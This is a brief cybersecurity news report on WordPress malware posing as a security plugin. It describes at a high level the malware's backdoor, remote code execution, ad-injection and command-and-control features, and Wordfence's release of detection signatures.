A sophisticated malware variant masquerading as a legitimate WordPress security plugin has been identified, capable of providing attackers with persistent access to compromised websites. This deceptive malware contains several functions that allow attackers to maintain backdoor access, execute arbitrary code remotely, and inject malicious JavaScript responsible for serving unwanted advertisements. The malicious code appears in the file system under innocuous names such as ‘WP-antymalwary-bot.php’ or ‘wp-performance-booster.php’, creating a facade of legitimacy while harboring dangerous capabilities including remote code execution, administrator access provision, and malicious code injection. This emerging threat represents a concerning evolution in WordPress-targeted malware, combining legitimate-appearing code structures with persistent infection mechanisms and sophisticated backdoor capabilities. The plugin’s design includes mechanisms to ping Command & Control (C&C) servers, providing attackers with real-time information about infected sites and enabling coordinated attacks across compromised platforms. Wordfence researchers identified the malware during a routine site cleanup on January 22, 2025, noting its unusual sophistication and the careful effort to mimic legitimate plugin architecture. Every minute, the malware sends the infected site’s URL and a timestamp, enabling attackers to maintain an updated inventory of compromised websites. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The security team subsequently developed detection signatures and released them to premium customers by January 24, with free version users scheduled to receive protection by May 23, 2025.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 01 May 2025 12:50:35 +0000